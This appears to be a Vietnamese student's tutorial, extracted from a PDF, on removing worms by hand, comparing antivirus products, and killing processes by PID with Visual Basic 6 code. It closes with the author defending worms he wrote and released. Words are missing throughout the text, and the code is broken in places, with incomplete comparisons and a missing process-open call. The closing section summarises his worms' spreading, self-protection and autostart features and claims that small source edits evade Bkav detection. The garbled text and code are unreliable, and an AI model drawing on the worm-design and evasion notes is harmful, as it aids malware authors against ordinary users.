Bạn đừng nghĩ rằng bạn ngắt chương trình đó xóa key của nó tạo regedit xong việc, virus thường để lại nhiều “Tàn tích” máy tính của bạn, vậy nếu thực thao tác chưa đủ

b.1 Xác định “Tàn tích” :

Chúng ta dùng Process Explorer để xác định chuỗi file virus (Đây nguyên tắc mà phần mềm chống Virus xác định để chống virus)

Thao tác sau : Trong Process Explorer bấm chuột phải vào tiến trình (Proscess) của virus Sau đó chọn Properties sau đó ấn chọn Strings

Một loạt chuỗi xuất Sau đó bạn ngồi tìm những chuỗi có dạng một đường dẫn ghi lại chúng Đó những địa của tàn tích

b.2 Dọn dẹp :

Với virus thông bạn cần dùng Process Explorer để kết thúc sự làm việc của virus (Bấm chuột phải chọn Kill Process) Sau đó bạn dùng Autoruns để xóa key khởi động virus đó regedit (Bấm chuột phải chọn Delete) Cuối bạn tìm đến địa của “Tàn tích” để xóa bỏ chúng (Hãy thận trọng có thể đó một file quan trọng của hệ thống)

Với bạn có thể tự tay tiêu diệt được khoảng 85% loại virus cịn với một số loại virus có một số chế độ “Phịng thủ” cao cấp vào phần sau Dũng còi đề cập

2 Lựa chọn phần mềm chống virus (Antivirus =AV) :

Có nhiều phần mềm chống virus, nhiên cấu hình máy tệ nên Dũng còi dám test phần mềm sau : Bkav, AVG, McAfee, Kaspersky Và cuối Dũng cịi tìm thấy mợt phần mềm tut vời (Tuy nhiên để khách quan Dũng còi phân tích thằng số này)

(14)

Tính diệt virus khơng cần nói (AV mà khơng diệt Virus dẹp), nhiên khả tự động cảnh báo hành vi thông thường của Virus khơng có Chưa kể ơng Bkav cịn diệt không một số loại virus nhận được chúng

Thậm chí hơm trước biết worm viết được ơng Bkis cập nhật Bkav Dũng cịi tải “Coi cho vui”, té ngửa cần thay đổi mợt vài dòng code source worm đó (Đã được cập nhật) làm Bkav pó tay (Mịa cha ưi, nếu Dũng cịi muốn chọc giận Bkis mợt ngày Dũng cịi phải bắt cập nhật vài chục biến thể => Pó tay luôn)

Tuy nhiên phải công nhận, Bkav phần mềm chống Virus thường cập nhật virus Made In Việt Nam mà đôi lúc phần mềm lớn khác không cập nhật (Tuy nhiên, tính tự đợng bảo vệ của AV mạnh thông thường dư sức tiêu diệt loại worm này)

AVG : Tính tìm diệt virus tốt Tuy nhiên tính tự đợng cảnh báo hành vi “Bất chính” hầu khơng có Giao diện rối rắm, khó sài Tuy nhiên với nhu cầu “Quét” bình thường ok

McAfee : Khá ngốn RAM hệ thống, tính diệt tốt, có nhiều tùy chọn nâng cao, giao diện dễ sài Tuy nhiên tính tự đợng nhận diện có khơng làm việc tốt lắm (Có thao tác nguy hiểm bị nhận cảnh báo)

Như vậy rõ ràng với người dùng bình thường sài “Ổn” Kaspersky :

Phần mềm AV tốt mà Dũng còi dùng (Trong phần mềm được liệt kê) Chạy chiếm dung lượng bộ nhớ, công cụ diệt tốt, giao diện dễ sài

Tính tự đợng cảnh báo làm việc xuất sắc Cảnh báo cực kỳ hiệu : - Cảnh báo thao tác ghi key khởi động

- Cảnh báo dấu hiệu tự động Copy file hay chỉnh sửa file (Với file thực thi) - Cảnh báo việc tự động cài Driver vào hệ thống

- Cảnh báo việc mở mợt URL thơng qua trình duyệt web mợt chương trình đó

- Cảnh báo việc Hook, hay Inject vào process hệ thống (Rất tốt để chống KeyLog cấp thấp một số thao tác nguy hiểm khác)

nhiều tính khác

Tuy nhiên, q “Tốt” nên đôi lúc làm người dùng khó chịu (Qúa nhiều cảnh báo), đòi hỏi người dùng phải có những hiểu biết PC sử dụng đạt hết hiệu

Một số cảnh báo “Thừa” thường gặp (Bản thân Dũng còi gặp) : - Cảnh báo viêc đọc file của Explorer.exe

- Các chương trình load mợt chương trình đó (Đơi lúc gây thừa) - Cảnh báo với tập tin xem Flash (Thao tác đọc ghi file)

- Tương tự thao tác xem tập tin Flash (Định dạng exe) mợt số chương trình cài đặt cố gắng trích xuất file riêng bị cảnh báo (Rất khó chịu)

- Tính Trusted Modules hay để xác định chương trình “Lương thiện” (Do người dùng tự chọn), gây nhiều khó chịu (Anh Kav kỹ tính quá)

nhiều lắm

Cần nói thêm sài thằng cịn có nhiều điều thú vị (Như đơi lúc có thể coi q trình làm việc của mợt tập tin đó, việc cực kỳ hiệu để tiến hành Crack)

Thông tin cảnh báo được đưa chi tiết cụ thể, phần History cực kỳ cần thiết để xác định worm thơng tin để dễ tiêu diệt chúng (Tính tuyệt vời)

3 Dùng code trị code :

(15)

Việc dùng phần mềm chống Virus thông thường chưa chắc diệt loại virus vậy (Loại worm lúc tạo nhiều process để bảo vệ cho nhau) Vậy chúng ta tự làm vậy :

a Kill process :

Về bản, việc Kill process có nhiều cách nhiên nhiên rõ ràng, việc Kill process dựa vào tên nguy hiểm (Ví dụ worm đó hoạt đợng với tên process explorer.exe chắc chắn nếu bạn dùng cách kill diệt cái explorer.exe “Lành”) Không biết bạn có cách nào, nhiên Dũng còi sử dụng cách Kill thông qua số ID của Process sau xác định xác Path của chúng

Các thao tác công việc :

1 Liệt kê Process hoạt động hệ thống đồng thời lấy thông số ID của chúng (Mỗi Process có ID số nhất)

2 Liệt kê Path (Đường dẫn) tương ứng của Process

3 Thực trình so sánh đường dẫn với process liệt kê, nếu đúng kill chúng theo số ID (Đã được liệt kê trên)

Code :

‘Đây thao tác Kill process thông thường thui nha Public Declare Function CreateToolhelpSnapshot Lib "kernel32" _ Alias "CreateToolhelp32Snapshot" ( _

ByVal lFlags As Long, _

ByVal lProcessID As Long) As Long

Public Declare Function ProcessFirst Lib "kernel32" _ Alias "Process32First" ( _

ByVal hSnapShot As Long, _

uProcess As PROCESSENTRY32) As Long Public Declare Function ProcessNext Lib "kernel32" _ Alias "Process32Next" ( _

ByVal hSnapShot As Long, _

uProcess As PROCESSENTRY32) As Long

Public Declare Function TerminateProcess Lib "kernel32" ( _ ByVal hProcess As Long, _

ByVal uExitCode As Long) As Long

Public Declare Function OpenProcess Lib "kernel32" ( _ ByVal dwDesiredAccess As Long, _

ByVal bInheritHandle As Long, _ ByVal dwProcessId As Long) As Long

Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Public Const TH32CS_SNAPPROCESS = &H2

Public Const TH32CS_SNAPheaplist = &H1 Public Const TH32CS_SNAPthread = &H4 Public Const TH32CS_SNAPmodule = &H8

Public Const TH32CS_SNAPall = TH32CS_SNAPPROCESS + TH32CS_SNAPheaplist + TH32CS_SNAPthread + _ TH32CS_SNAPmodule

Private Declare Function EnumProcessModules Lib "psapi.dll" ( _ ByVal hProcess As Long, _

ByRef lphModule As Long, _ ByVal cb As Long, _

ByRef cbNeeded As Long) As Long

Private Declare Function GetModuleFileNameExA Lib "psapi.dll" ( _ ByVal hProcess As Long, _

(16)

Public Const MAX_PATH As Integer = 260 Public Type PROCESSENTRY32

dwSize As Long cntUsage As Long th32ProcessID As Long th32DefaultHeapID As Long th32ModuleID As Long cntThreads As Long

th32ParentProcessID As Long pcPriClassBase As Long dwFlags As Long

szExeFile As String * MAX_PATH End Type

Private Const PROCESS_QUERY_INFORMATION = &H400 Private Const PROCESS_VM_READ = &H10

Function ProcessPathByPID(pid As Long) As String ‘Lấy đường dẫn thông qua số ID

'Return path to the executable from PID

'http://support.microsoft.com/default.aspx?scid=kb;en-us;187913 Dim cbNeeded As Long

Dim Modules(1 To 200) As Long Dim Ret As Long

Dim ModuleName As String Dim nSize As Long

Dim hProcess As Long

hProcess = OpenProcess(PROCESS_QUERY_INFORMATION _ Or PROCESS_VM_READ, 0, pid)

If hProcess <> Then

Ret = EnumProcessModules(hProcess, Modules(1), _ 200, cbNeeded)

If Ret <> Then

ModuleName = Space(MAX_PATH) nSize = 500

Ret = GetModuleFileNameExA(hProcess, _ Modules(1), ModuleName, nSize)

ProcessPathByPID = Left(ModuleName, Ret) End If

End If

Ret = CloseHandle(hProcess) If ProcessPathByPID = "" Then ProcessPathByPID = "SYSTEM" End If

End Function

Public Sub KillID(p_lngProcessId As Long) ‘Kill process qua số ID

Dim lnghProcess As Long Dim lngReturn As Long

(17)

lngReturn = TerminateProcess(lnghProcess, 0&) End Sub

Public Sub LietKe() ‘Liệt kê process

Dim GiaTri As Boolean Dim theloop As Long Dim dd As Double

Dim proc As PROCESSENTRY32 Dim snap As Long

Dim exename As String Dim id As Long

lst.Clear lstID.Clear

snap = CreateToolhelpSnapshot(TH32CS_SNAPall, 0) proc.dwSize = Len(proc)

theloop = ProcessFirst(snap, proc) GiaTri = False

While theloop <> id = proc.th32ProcessID

Msgbox ProcessPathByPID(proc.th32ProcessID) ‘Path của process MsgBox proc.th32ProcessID ‘ID của process theloop = ProcessNext(snap, proc)

Wend

CloseHandle snap End Sub

Trên đoạn code bản, nếu bạn muốn tải ví dụ cụ thể (Trước Dũng cịi có viết một nho nhỏ để tiện diệt loại worm dạng này), bạn có thể tải địa sau :

b Một ứng dụng diệt worm Tại không ?

Khi một worm lây lan mạnh, việc diệt thủ công với PC với nhiều thao tác khó chịu Vì vậy chúng ta khơng tự viết một soft chuyên trị chúng ? Rất đơn giản

Bạn có thể coi source mẫu (Bạn nên sửa lại phần Process cho thích hợp)

Các link download :

Made in Dũng còi :

Source RealWorm (Bkav cập nhật với tên W32.DakNong Worm ) :

Source VBVN (Bkav cập nhật với tên W32.vbvn Worm)

Source DungCoi (Bkav cập nhật với tên W32.YMDungCoi Worm)

Source AVS (Công cụ Kill process hàng loạt) :

Source Remove DungCoi (Diệt worm DungCoi): Phần mềm khác :

Địa tải ProcessXP Autoruns : http://www.sysinternals.com

Những địa đáng lưu tâm nghiên cứu virus :

(18)

http://www.viruslist.com/en : Danh sách virus, phân tích virus

http://www.rohitab.com : Forum lớn vấn đề bảo mật nói chung virus nói riêng (Về virus forum đáng quan tâm)

http://www.hvaonline.net : Forum bảo mật hàng đầu Việt Nam, có nhiều viết giá trị virus

http://vnsecurity.com : Một những forum bảo mật hùng mạnh (Trước cịn hoạt đợng với tên miền VietHacker.org)

http://www.vietvirus.org : Forum Dũng cịi làm sếp (Hì hì), tình hình của “Sếp” bất ổn nên forum tạm thời đóng cửa mong rằng Dũng cịi sớm “Lơi” nó dậy

http://www.bkav.com.vn : Có lẽ trang web hay bằng Tiếng Việt để đọc định nghĩa virus kiến thức khác virus (Rất hay đó)

http://www.quantrimang.com : Trang web tiếng Việt, có nhiều viết hay virus nói riêng vấn đề khác của tin học nói riêng

http://www.rootkit.com : Trang web hàng đầu thế giới vấn đề RootKit - Một những kỹ thuật đáng sợ của virus (Do chưa đủ trình đợ nên Dũng cịi khơng dám đụng tới vấn đề viết)

Ngoài Website của mợt số hãng chống virus có những phân tích thơng tin đáng giá loại virus

V Lời kết :

Dạo này, có nhiều bạn cơng khai trích những việc làm của Dũng còi (BomChat,Virus) Rõ ràng nếu bạn thật sự người quan tâm đến Dũng còi quan sát bước của Dũng còi việc lập trình bạn thấy rõ, từ worm dcDakNong đến RealWorm (dcDakNong -> DungCoi -> VBVN -> RealWorm) những bước tiến của Dũng còi (Điều thể dự án viết)

Toàn bợ worm Dũng cịi viết Cịi chưa muốn phát tán (Trường hợp worm DungCoi lây mợt “Tai nạn”, cịn với RealWorm (Bkis đặt tên DakNong) có một số kẻ cố tính biên dịch dịng worm này) Vì vậy đừng quy kết cho Dũng “Tội”

Có thể nói gần tồn bợ kiến thức lập trình của Dũng cịi có nhờ trình nghiên cứu virus (Kiến thức virus, Anti Virus, mợt số kỹ tḥt lập trình 2, khả code) -> Dũng cịi viết thứ khơng ngồi mục đích học tập mà thơi

Nói vậy, không tức Dũng ủng hộ hành động viết virus Dũng ủng hộ nếu bạn tự nghiên cứu viết một virus riêng tất nhiên không phát tán Nếu ngược lại, tất yếu bạn tự nhận hậu của

Thơng tin “Ngoài lề” :

=============================================

Theo nguồn tin “Rất đáng tin cậy” cách tháng (1 tháng sau worm DungCoi “Xổng chuồng”) C14 đến trường Dũng còi để “Nhắc nhở” với ban giám hiệu Ngay sau đó Dũng còi bị gọi khẩn cấp xuống gặp thầy hiệu phó để “Uống nước” (Thật bắt đứng nửa tiếng rùi thầy hiệu trưởng cho về) Cũng những ngày này, thông tin Dũng còi bị đuổi học, liên tục xuất (Nói thiệt hồi đầu Dũng còi ứ tin đâu)

Vài ngày hôm sau ban giám hiệu nhà trường họp lại, thầy hiệu phó kiên quyết cho Dũng “Về vườn”, may lúc đó một số thầy cô đưa ý kiến “Nó học 12 năm rồi, cịn tháng mà đuổi tội lắm”.

Nên sau đó nhà trường thống không đả động đến vụ nữa “Tha mạng” cho Còi

Đến cuối học kỳ, ban giám hiệu họp lại để thống chuyện khen thưởng Dũng còi bi đẩy xuống hạnh kiểm loại Khá (Từ lớp đến Dũng còi có hạnh kiểm loại Tốt)

Túm lại : Dù có nhiều “Trục trặc” Dũng còi ăn no, ngủ kỹ, chơi hê chẳng có vấn đề chi lớn chứ không một số người cho rằng Còi bị túm cổ cơng an, khơng được vơ phịng máy của trường

=============================================

(19)

ấy chú công an lại “Tha” cho Dũng ? Có lẽ Dũng còi “Ăn phúc đức”, hoặc có “Quái nhân phù trợ” nên “Tai qua nạn khỏi” (Hì hì, chắc vậy)

Nói cho vui vậy, Dũng còi nói cho biết trước, nếu viết virus phát tán lung tung chuẩn bị vài chục triệu để chuẩn bị đóng tiền phạt vừa (Không có người có “May” Còi đâu)

============================================

Đáng lý viết kết thúc phần trên, nhiên gần một số người biết Cịi qua mợt vài Web đó (Như 911) mà dám Send những Email với những nội dung đậm chất “Anh cả”, thấy một kiểu “Dạy đời” Thực tế không hiểu khỉ chi Còi hết

Nếu đó quy kết cho Dũng cịi đủ tợi Ok Xem tui chứng minh mệnh đề : Dũng cịi = Vơ tội

1 Tại tui để tên process của worm dc.exe , sviq.exe fun.exe Nếu tui thực sự muốn phát tán vậy “Lộ liễu” Ok Điều chứng tỏ tui viết nó cho vui (Fun) chứ ko cần nó lây lan

2 Trong worm DungCoi bị lây lan Host dungcoivb.googlepages.com nằm tay của tui Tại tui ko sử dụng khả lây qua Y!M để phát tán (Với vài dòng code bằng VBS một thay đổi từ Host dễ dàng) mà lại để thông điệp “Canh bao, may tinh ban da nhiem worm DungCoi” (Điều có thể kiểm chứng bằng nạn nhân của worm này) Ok, điều chứng tỏ, tui không thèm đề nó lây lan (Dù rằng với cách số nạn nhân theo tăng lên nhanh)

3 Tại worm tui tự hào, tốn nhiều tâm huyết của tui (Con vbvn) ko lây lan ? Trong nếu thực sự tui muốn phát tán worm, vbvn worm mạnh của tui => Tui ko thèm Nếu tiếng có cần thiết tui phải cơng bố source của worm đó không ? Hay cần ngồi tiệm net kích hoạt chúng đủ ? (Nếu bạn đọc source hay test worm bạn tự trả lời được) Các bạn nên nhớ tất worm được công bố source sau tui viết, trước bị an ninh mạng phát hiện lâu sau đó

5 Tại tui lại phải viết nhiều worm cần một worm DungCoi có chứ “Nổi” (Như một số người nói) ?

Ok, tui viết worm để tự thử sức Mỗi worm một lần thể một kỹ thuật lập trình mà vừa biết, theo đó bước tiến của tui việc lập trình

6 Nếu muốn “Nổi” cần copy một source worm khác rùi phát tán chứ có cần tui phải tự viết ? Nếu RealWorm (Dòng worm Bkis cập nhật DakNong) thực sư tui muốn phát tán tui có ngu đến mức để dịng chữ DakNong phần thông tin của Worm để người dùng dễ dàng phát không ? Sau bảng tóm tắt mốc quan trọng (Chỉ nêu những điểm mốc)

Worm dcDakNong : - Tự động cập nhật - Lây qua Y!M

Viết “Host lập trình ứng dụng”

Worm DungCoi :

- Áp dụng phương thức “Host lập trình ứng dụng” điều khiển thông điệp muốn lây lan qua Y!M - Lây lan qua USB

- Tự bảo vệ bằng cách tạo process tự bảo vệ - Lây qua mạng LAN

Viết “Tự viết ứng dụng bảo vệ liệu bản”

Viết “ Ứng dụng di động Khó khăn hướng giải quyết”

Worm vbvn (Visual Basic Việt Nam) :

- Áp dụng kiến thức từ viết trên, đó quan trọng viết “ Ứng dụng di động Khó khăn

hướng giải quyết” để tạo khả quyền điều khiển

- Ẩn danh process

- Sử dụng Key Userinit để khởi động

(20)

Worm RealWorm :

- Hoàn thiện worm DungCoi

Viết Safe Việt v1.0 để chống lại loại worm viết AutoIT loại worm có kiểu bảo vệ DungCoi RealWorm loại worm khác

Ok, ABC bước từ Virus đến Anti Virus Vậy bạn nghĩ ?

16 trang cho tài liệu cuối của Dũng còi cấp III Qúa ngắn đó gần tất những mà Dũng cịi học được gần năm qua (Dũng còi ngu q phải khơng hì hì)

www.quantrimang.com http://www.sysinternals.com : http://www.viruslist.com/en : : http://www.hvaonline.net : http://vnsecurity.com : http://www.vietvirus.org : http://www.bkav.com.vn : http://www.rootkit.com :

Ngày đăng: 24/04/2021, 08:51

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w